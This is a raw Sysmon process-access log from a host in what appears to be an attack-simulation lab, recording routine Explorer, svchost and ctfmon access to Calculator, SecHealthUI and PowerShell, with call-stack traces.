22:12:47.843{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360387Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337b-6013-8402-000000001100}16565764C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14517|C:\Windows\System32\CapabilityAccessManagerClient.dll+141f0|C:\Windows\System32\CapabilityAccessManagerClient.dll+151b5|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360386Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000360385Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.843{8e433fbf-337a-6013-7e02-000000001100}63045600C:\Windows\system32\ctfmon.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\MSCTF.dll+328e0|C:\Windows\System32\MSCTF.dll+31adc|C:\Windows\System32\MSCTF.dll+3176f|C:\Windows\System32\MSCTF.dll+315d2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360384Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-337b-6013-8402-000000001100}16562840C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+1f387|C:\Windows\system32\twinui.pcshell.dll+f86ac|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360383Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-337b-6013-8402-000000001100}16565764C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\CapabilityAccessManagerClient.dll+14387|C:\Windows\System32\CapabilityAccessManagerClient.dll+15172|C:\Windows\System32\CapabilityAccessManagerClient.dll+13ea0|C:\Windows\system32\twinui.pcshell.dll+6bf67|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360382Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360381Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000360380Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9 10341000x8000000000000000360379Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-337b-6013-8402-000000001100}16561804C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1440C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+10c49|C:\Windows\System32\NPSMDesktopProvider.dll+10b82|C:\Windows\System32\NPSMDesktopProvider.dll+774d|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360378Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.827{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360377Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360376Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000360375Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360374Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360373Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+374d7|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360372Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-337b-6013-8402-000000001100}16566216C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+9685f|C:\Windows\System32\TaskFlowDataEngine.dll+96359|C:\Windows\System32\TaskFlowDataEngine.dll+95d85|C:\Windows\System32\TaskFlowDataEngine.dll+93be5|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360371Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.812{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+37271|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360370Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16562912C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\NPSMDesktopProvider.dll+1dbfa|C:\Windows\System32\NPSMDesktopProvider.dll+139e2|C:\Windows\System32\NPSMDesktopProvider.dll+1415b|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360369Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+2aff6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360368Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360367Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-339f-6013-c402-000000001100}3448C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SecHealthUI.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360366Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360365Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.796{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x2000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.dll+72909|C:\Windows\system32\twinui.dll+78432|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360364Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 